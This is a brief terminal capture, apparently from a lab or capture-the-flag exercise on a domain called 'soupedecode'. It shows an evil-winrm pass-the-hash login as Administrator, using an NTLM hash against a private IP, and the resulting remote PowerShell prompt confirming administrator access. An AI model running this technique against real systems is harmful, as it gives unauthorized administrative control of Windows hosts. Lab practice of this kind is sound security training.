> evil-winrm -i 192.168.56.126 -u Administrator -H 8982babd4da89d33210779a6c5b078bd
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
soupedecode\administrator